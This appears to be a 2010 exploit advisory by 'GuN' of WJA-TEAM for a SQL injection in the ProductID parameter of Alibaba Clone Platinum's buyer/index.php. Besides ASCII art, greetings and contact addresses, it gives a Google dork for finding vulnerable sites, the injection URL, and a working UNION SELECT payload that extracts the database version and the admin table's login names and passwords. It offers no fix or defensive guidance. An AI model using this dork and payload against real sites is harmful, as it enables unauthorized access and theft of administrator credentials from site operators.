74 lines
No EOL
1.7 KiB
Text
74 lines
No EOL
1.7 KiB
Text
# Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
|
||
# Author: GuN
|
||
# Published: 2010-14-05
|
||
# Verified: yes
|
||
|
||
|
||
........../¯¯/).................(\¯¯\..........
|
||
........./¯.//....................\\.¯\.........
|
||
......../..//.........GuN........\\..\........
|
||
../´¯`/'
|
||
|
||
/´`\...WJA-TEAM../´`\ '\`´¯\...
|
||
./
|
||
|
||
'/ / / /¨/¯\................./¯\¨\ \ \ \' \.
|
||
(
|
||
'( ´ ´ ¯\/'' )................( ''/\¯ ` ` )' )
|
||
|
||
|
||
|
||
|
||
-----------------------------------------------------------------------
|
||
Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
|
||
-----------------------------------------------------------------------
|
||
Author : GuN
|
||
Location : Tunisia - Tunis - Lycée el Omrane
|
||
Time Zone : GMT +1:00
|
||
----------------------------------------------------------------
|
||
|
||
Affected software description:
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
|
||
Application : Alibaba Clone Platinum
|
||
Vendor : http://www.alibabaclone.com/
|
||
Price : $699 USD
|
||
Google Dork : allinurl:buyer/index.php?ProductID=
|
||
Overview :B2B
|
||
trading Marketplace Script clone of alibaba
|
||
Marketplace script is a
|
||
wonderful solution to launch your own business to
|
||
business and b2c site.
|
||
Script is packed with lot of features to provide a
|
||
very sound foundation
|
||
to your trading portal site.
|
||
|
||
|
||
|
||
Exploit:
|
||
~~~~~~~
|
||
-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--
|
||
|
||
|
||
|
||
SQLi GuN:
|
||
~~~~~~~
|
||
|
||
http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID=
|
||
|
||
|
||
|
||
GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis
|
||
<3 Inter <==> Volc4n0 <==> Vbspiders.com
|
||
|
||
|
||
|
||
Contact:
|
||
|
||
XGuN@Hacker.Ps
|
||
|
||
~~~~
|
||
|
||
XGuN@ViP.Cn
|
||
|
||
~~~~ |